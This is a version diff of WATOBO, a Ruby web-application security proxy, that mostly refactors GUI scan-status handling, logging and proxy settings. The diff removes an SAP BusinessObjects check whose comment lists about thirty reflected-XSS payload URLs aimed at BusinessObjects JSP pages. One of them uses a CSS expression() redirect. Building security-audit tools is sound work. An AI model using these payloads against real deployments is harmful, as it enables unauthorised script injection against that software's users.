watobo 0.9.8.680 → 0.9.8.686

data/lib/watobo/gui/manual_request_editor.rb

@@ -403,7 +403,7 @@ module Watobo
                   orig = Watobo::Chat.new(first_request, first_response, :id => 0)
                   new = Watobo::Chat.new(second_request, second_response, :id => 0)
                   project = nil
-                  diffViewer = ChatDiffViewer.new(FXApp.instance, project, orig, new)
+                  diffViewer = ChatDiffViewer.new(FXApp.instance, orig, new)
                   diffViewer.create
                   diffViewer.show(Fox::PLACEMENT_SCREEN)
                end
@@ -458,6 +458,10 @@ module Watobo
          include Responder
          # ID_CTRL_S = ID_LAST
          # ID_LAST = ID_CTRL_S + 1
+         SCANNER_IDLE = 0x00
+         SCANNER_STARTED = 0x01
+         SCANNER_FINISHED = 0x02
+         SCANNER_CANCELED = 0x04
          def subscribe(event, &callback)
             (@event_dispatcher_listeners[event] ||= []) << callback
          end
@@ -508,7 +512,7 @@ module Watobo
 
          def logger(message)
           @log_viewer.log( LOG_INFO, message )
-          puts "[#{self.class.to_s}] #{message}"
+          puts "[#{self.class.to_s}] #{message}" if $DEBUG
          end
 
 
@@ -610,19 +614,24 @@ module Watobo
                }
               
               logger("Scan Started ...")
-              
+              @scan_status = SCANNER_STARTED
               Thread.new(run_prefs) { |rp|
-                  
+                  begin
                   # puts "* starting scanner ..."
                   # puts run_prefs.to_yaml
                   
                   @scanner.run( rp )
 
+                    #sender.text = "QuickScan"
+                  rescue => bang
+                    puts bang
+                    puts bang.backtrace if $DEBUG
+                  ensure
                    logger("Scan finished!")
-                     @pbar.total = 0
-                     @pbar.progress = 0
-                     @pbar.barColor = 'grey'
-                    sender.text = "QuickScan"
+                   @scan_status_lock.synchronize do
+                      @scan_status |= SCANNER_FINISHED
+                   end  
+                  end
                  }
             end
 
@@ -686,8 +695,8 @@ module Watobo
                @sel_pos = ""
                @sel_len = ""
 
-               @last_request = []
-               @last_response = []
+               @last_request = nil
+               @last_response = nil
 
                @history_size = 10
                @history = []
@@ -699,6 +708,8 @@ module Watobo
                @new_request = nil
                
                @update_lock = Mutex.new
+               @scan_status_lock = Mutex.new
+               @scan_status = SCANNER_IDLE
 
                # shortcuts here
                #FXMAPFUNC(SEL_COMMAND, ID_CTRL_S, :on_ctrl_s)
@@ -840,8 +851,8 @@ module Watobo
 
                frame = FXHorizontalFrame.new(req_editor, :opts => LAYOUT_FILL_X|FRAME_GROOVE)
 
-               btn_quickscan = FXButton.new(frame, "QuickScan", nil, nil, 0, FRAME_RAISED|FRAME_THICK)
-               btn_quickscan.connect(SEL_COMMAND, method(:onBtnQuickScan))
+               @btn_quickscan = FXButton.new(frame, "QuickScan", nil, nil, 0, FRAME_RAISED|FRAME_THICK)
+               @btn_quickscan.connect(SEL_COMMAND, method(:onBtnQuickScan))
                @pbar = FXProgressBar.new(frame, nil, 0, LAYOUT_FILL_X|LAYOUT_FILL_Y|FRAME_SUNKEN|FRAME_THICK|PROGRESSBAR_HORIZONTAL)
                #@pbar.create
                @pbar.connect(SEL_CHANGED) {
@@ -917,10 +928,24 @@ module Watobo
 
   def add_update_timer(ms)
   @update_timer = FXApp.instance.addTimeout( ms, :repeat => true) {
+    @scan_status_lock.synchronize do
+      
+      if @scan_status == ( SCANNER_STARTED | SCANNER_FINISHED ) or @scan_status == ( SCANNER_STARTED | SCANNER_CANCELED )
+        puts "[SCAN-STATUS] #{@scan_status}"
+         @pbar.total = 0
+         @pbar.progress = 0
+         @pbar.barColor = 'grey'
+         @btn_quickscan.text = "QuickScan"
+         @scan_status = SCANNER_IDLE
+      end
+    end
     @update_lock.synchronize do
       unless @new_response.nil? 
+        @last_request = nil
+        @last_response = nil
         
         @response_viewer.setText @new_response
+        @last_response = @new_response
 
         if @logChat.checked? == true
 
@@ -932,6 +957,7 @@ module Watobo
 
       unless @new_request.nil? then
         @request_viewer.setText @new_request
+        @last_request = @new_request
 
         @response_viewer.setText(@new_response, :filter => true)
         @responseMD5.text = @new_response.contentMD5
@@ -1000,17 +1026,6 @@ end
                
                logger("got answer")
                
-               if @logChat.checked? == true
-                 logger("log chat")
-                     chat = Watobo::Chat.new(last_request, last_response, :source => CHAT_SOURCE_MANUAL, :run_passive_checks => false)
-                     notify(:new_chat, chat)
-                  end
-                  
-               
-               #puts "finished (#{last_response.status})"
-             #  puts last_request.url
-             #  puts last_response.status
-
 
 =begin
                if last_request and p[:follow_redirect] == true and last_response.status =~ /302/

data/lib/watobo/gui/proxy_dialog.rb

@@ -38,11 +38,11 @@ module Watobo
           :password => @password_dt.value,
           :workstation => @workstation_dt.value,
           :domain => @domain_dt.value,
-          :type => @auth_type
+          :auth_type => @auth_type
         }
 
         puts "* auth_type"
-        puts c[:type]
+        puts c[:auth_type]
         if @auth_types_cb.currentItem > 0 and c[:username] != "" and c[:password] != ""
         s.update c
         end
@@ -174,8 +174,8 @@ module Watobo
         @auth_types_cb.setCurrentItem(0)
 
         unless proxy.nil?
-          if proxy.has_key?(:credentials)
-            case proxy[:credentials][:type]
+          if proxy.has_key?(:auth_type)
+            case proxy[:auth_type]
             when AUTH_TYPE_NTLM
               @auth_types_cb.setCurrentItem(1)
             end
@@ -429,7 +429,7 @@ module Watobo
       end
 
       def addProxyItem(proxy)
-        puts proxy.to_yaml
+       # puts proxy.to_yaml
         lastRowIndex = @proxyTable.numRows
         siteIndex = -1
         lastRowIndex.times do |i|

data/lib/watobo/gui/quick_scan_dialog.rb

@@ -32,7 +32,7 @@ module Watobo
         o[:use_orig_request] = @useOriginalRequest.checked?
         o[:detect_logout] = @detectLogout.checked?
         o[:follow_redirect] = @followRedirects.checked?
-        puts o.to_yaml
+        puts o.to_yaml if $DEBUG
         o
       end
 

data/lib/watobo/gui/save_chat_dialog.rb

@@ -24,7 +24,7 @@ module Watobo
     class SaveChatDialog < FXDialogBox
       class Sender < Watobo::Session
         def initialize()
-          @project = Watobo::Gui.active_project
+          @project = Watobo::Gui.project
           super(@project.object_id,  @project.getScanPreferences())
 
         end

data/lib/watobo/gui/sites_tree.rb

@@ -42,7 +42,7 @@ module Watobo
       # @interface.updateRequestTable(@project)
       end
 
-def refresh_tree()
+      def refresh_tree()
         self.clearItems
 
         @project.chats.each do |chat|
@@ -51,6 +51,7 @@ def refresh_tree()
 
       # @interface.updateRequestTable(@project)
       end
+
       def expandFullTree(item)
         self.expandTree(item)
         item.each do |c|
@@ -115,10 +116,10 @@ def refresh_tree()
         site = self.findItem(chat.request.site, nil, SEARCH_FORWARD|SEARCH_IGNORECASE)
 
         if not site then
-        # found new site
-        site = self.appendItem(nil, chat.request.site, @siteIcon, @siteIcon)
-        #site = @findings_tree.moveItem(project.first,project,site)
-        self.setItemData(site, :item_type_site)
+          # found new site
+          site = self.appendItem(nil, chat.request.site, @siteIcon, @siteIcon)
+          #site = @findings_tree.moveItem(project.first,project,site)
+          self.setItemData(site, :item_type_site)
 
         end
 
@@ -140,9 +141,9 @@ def refresh_tree()
             end
             #folder_item = self.findItem(folder_name, folder_parent, SEARCH_FORWARD|SEARCH_WRAP)
             if folder_item.nil? then
-            #folder_item = self.appendItem(folder_parent, folder_name, @folderIcon, @folderIcon)
-            folder_item = self.insertItem(folder_parent.first, folder_parent, folder_name, @folderIcon, @folderIcon)
-            self.setItemData(folder_item, :item_type_folder)
+              #folder_item = self.appendItem(folder_parent, folder_name, @folderIcon, @folderIcon)
+              folder_item = self.insertItem(folder_parent.first, folder_parent, folder_name, @folderIcon, @folderIcon)
+              self.setItemData(folder_item, :item_type_folder)
 
             #     puts "added folder #{folder_name} to #{folder_parent} for site #{chat.request.site}"
             end
@@ -206,9 +207,9 @@ def refresh_tree()
             getApp().beginWaitCursor do
               begin
                 if item.data
-                #if item.data.class.to_s =~ /Qchat/
-                #@interface.show_chat(item.data)
-                notify(:show_chat, item.data)
+                  #if item.data.class.to_s =~ /Qchat/
+                  #@interface.show_chat(item.data)
+                  notify(:show_chat, item.data)
                 #end
                 chat = item.data
                 #         url_parts.unshift chat.request.file_ext
@@ -256,14 +257,15 @@ def refresh_tree()
                 ["404", "302"].each do |rc|
                   target = FXMenuCheck.new(sub, "#{rc} Status" )
 
-                  target.check = @tree_filters[:response_status].include?(rc)
+                  target.check = @tree_filters[:response_status].include? rc
 
-                  target.connect(SEL_COMMAND) {
-                    status = target.to_s.slice(/\d+/)
-                    if sender.checked?()
-                    @tree_filters[:response_status].push status
+                  target.connect(SEL_COMMAND) { |tsender, tsel, titem|
+                    
+                    rs = tsender.to_s.slice(/\d+/)
+                    unless @tree_filters[:response_status].include? rs
+                      @tree_filters[:response_status].push rs
                     else
-                    @tree_filters[:response_status].delete(status)
+                      @tree_filters[:response_status].delete rs
                     end
                     reload() if @project
                   }

data/lib/watobo/gui/utils/load_plugins.rb

@@ -40,7 +40,6 @@ module Watobo
         # this is the old plugin style
         Dir["#{Watobo.plugin_path}/*"].each do |sub|
           if File.ftype(sub) == "directory"
-            puts "+ #{sub}"
             Dir["#{sub}/#{File.basename(sub)}.rb"].each do |plugin_file|
               begin
                 puts "* processing plugin file #{plugin_file}" if $DEBUG
@@ -74,7 +73,7 @@ module Watobo
                 #
                 plugin_class = plugin.slice(0..0).upcase + plugin.slice(1..-1).downcase
                 class_name = "Watobo::Plugin::#{group_class}::Gui::Main"
-                puts class_name
+                #puts class_name
                 class_constant = Watobo.class_eval(class_name)
 
                 Watobo::Gui.add_plugin class_constant.new(Watobo::Gui.application, project)

data/lib/watobo/gui.rb

@@ -20,15 +20,18 @@
 # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 # .
 begin
+  print "\nLoading FXRuby ... this may take some time ... "
   require 'fox16'
   require 'fox16/colors'
+  print "[OK]\n"
 rescue LoadError
+  print "[FAILED]\n"
   puts "!!! Seems like FXRuby is not installed !!!"
   puts "please check the installation tutorial at http://watobo.sourceforge.net"
   exit
 end
 
-  if RUBY_PLATFORM =~ /(linux|bsd|solaris|hpux|darwin)/i
+  if RUBY_PLATFORM =~ /(linux|bsd|solaris|hpux|darwin)/i then
     begin
       require 'selenium-webdriver'
     rescue LoadError
@@ -47,15 +50,11 @@ module Watobo
     @application = nil
     @icon_path = File.expand_path(File.join(File.dirname(__FILE__),"..","..","icons"))
 
-    @active_project = nil
+    @project = nil
     def self.history
       unless defined? @history
         hf = Watobo::Conf::Gui.history_file
-        puts Watobo::Conf::Gui.dump.to_yaml
         wd = Watobo.working_directory
-        puts "* create new history"
-        puts "* in working directory: #{wd}"
-        puts "* history file: #{hf}"
         
       history_file = File.join(wd , hf)
       @history = SessionHistory.new(history_file)
@@ -89,50 +88,43 @@ module Watobo
       @application
     end
 
-    def self.active_project
-      @active_project
+    def self.project
+      @project
     end
     
-    def self.active_project=(project)
-      @active_project = project
+    def self.project=(project)
+      @project = project
     end
     
-    private
-
-def self.check_first_run
-  file = File.join(File.expand_path(File.dirname(__FILE__)), "..", "..", "disclaimer.chk")
-  unless File.exists?(file)
-    first_start_info = Watobo::Gui::AboutWatobo.new(@main_window)
-    if first_start_info.execute != 0 then
-      File.new(file, "w")
-    else
-      exit
-    end
-  end
-end
+    def self.check_first_run
+       file = File.join(File.expand_path(File.dirname(__FILE__)), "..", "..", "disclaimer.chk")
+       unless File.exists?(file)
+          first_start_info = Watobo::Gui::AboutWatobo.new(@main_window)
+         if first_start_info.execute != 0 then
+            File.new(file, "w")
+         else
+           exit
+         end
+       end
+     end
   end
 end
 
 %w( load_icons gui_utils load_plugins session_history save_default_settings master_password session_history save_project_settings save_proxy_settings ).each do |l|
   require File.join("watobo","gui","utils", l)
 end
-#require 'watobo/gui/utils/load_icons'
-#require 'watobo/gui/utils/gui_utils'
-#require 'watobo/gui/utils/load_plugins'
-#require 'watobo/gui/utils/session_history'
-#require 'watobo/gui/utils/save_default_settings'
 
 Watobo::Gui.create_application
 
 require 'watobo/gui/utils/init_icons'
 
 gui_path = File.expand_path(File.join(File.dirname(__FILE__), "gui"))
-#puts "* loading gui #{gui_path}"
+
 Dir.glob("#{gui_path}/*.rb").each do |cf|
   next if File.basename(cf) == 'main_window.rb' # skip main_window here, because it must be loaded last
   require File.join("watobo","gui", File.basename(cf))
-
 end
+
 require 'watobo/gui/templates/plugin'
 require 'watobo/gui/templates/plugin2'
-require 'watobo/gui/main_window'
+require 'watobo/gui/main_window'

data/lib/watobo.rb

@@ -44,7 +44,7 @@ require 'watobo/framework'
 
 module Watobo
 
-  VERSION = "0.9.8-680"
+  VERSION = "0.9.8-686"
 
   def self.base_directory
     @base_directory ||= ""
@@ -69,8 +69,17 @@ module Watobo
   def self.version
     Watobo::VERSION
   end
+  
+  def self.print_summary
+    puts "--- Info ---"
+    puts "Version: " + version
+    puts "Working Directory: " + Watobo.working_directory
+    puts "Active Checks Location: " + Watobo.active_module_path
+    puts "Passive Checks Location: " + Watobo.passive_module_path
+    puts "---"
+    puts
+  end
 end
 
-puts "* init framework ..."
 Watobo.init_framework
 

data/plugins/sslchecker/gui/gui.rb

@@ -169,7 +169,8 @@ module Watobo
           COMBOBOX_STATIC|FRAME_SUNKEN|FRAME_THICK|LAYOUT_SIDE_TOP|LAYOUT_FILL_X)
           #@filterCombo.width =200
 
-          @sites_combo.numVisible = 20
+          num_ssl_sites = @project.listSites(:ssl => true).length
+          @sites_combo.numVisible = num_ssl_sites > 15 ? 15 : num_ssl_sites
           @sites_combo.numColumns = 35
           @sites_combo.editable = true
           @sites_combo.connect(SEL_COMMAND, method(:onSiteSelect))

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: watobo
 version: !ruby/object:Gem::Version
-  version: 0.9.8.680
+  version: 0.9.8.686
   prerelease: 
 platform: ruby
 authors:
@@ -9,11 +9,11 @@ authors:
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2012-04-10 00:00:00.000000000Z
+date: 2012-04-17 00:00:00.000000000Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: fxruby
-  requirement: &24308700 !ruby/object:Gem::Requirement
+  requirement: &28553580 !ruby/object:Gem::Requirement
     none: false
     requirements:
     - - ! '>='
@@ -21,12 +21,13 @@ dependencies:
         version: '0'
   type: :runtime
   prerelease: false
-  version_requirements: *24308700
+  version_requirements: *28553580
 description: WATOBO is intended to enable security professionals to perform efficient
   (semi-automated ) web application security audits. It works like a local web proxy.
 email: watobo@siberas.de
 executables:
 - watobo_gui.rb
+- watobo
 extensions: []
 extra_rdoc_files: []
 files:
@@ -163,7 +164,6 @@ files:
 - modules/active/fileinclusion/lfi_simple.rb
 - modules/active/Flash/crossdomain.rb
 - modules/active/jboss/jboss_basic.rb
-- modules/active/sap/business_objects.rb
 - modules/active/sap/its_commands.rb
 - modules/active/sap/its_services.rb
 - modules/active/sap/its_service_parameter.rb
@@ -292,6 +292,7 @@ files:
 - CHANGELOG
 - .yardopts
 - bin/watobo_gui.rb
+- bin/watobo
 homepage: http://watobo.sourceforge.net
 licenses: []
 post_install_message: 

data/modules/active/sap/business_objects.rb

@@ -1,73 +0,0 @@
-# .
-# business_objects.rb
-# 
-# Copyright 2012 by siberas, http://www.siberas.de
-# 
-# This file is part of WATOBO (Web Application Tool Box)
-#        http://watobo.sourceforge.com
-# 
-# WATOBO is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation version 2 of the License.
-# 
-# WATOBO is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-# 
-# You should have received a copy of the GNU General Public License
-# along with WATOBO; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-# .
-=begin
-http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
-http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
-http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
-http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
-http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
-http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
-http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
-http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
-http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
-http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
-http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
-http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC  
-=end
-
-
-module Watobo
-  module Modules
-    module Active
-      module Sap
-        
-        
-        class Business_objects < Watobo::ActiveCheck
-          
-          def initialize(project, prefs={})
-           
-            super(project, prefs)
-          end
-        end
-        
-end
-end
-end
-end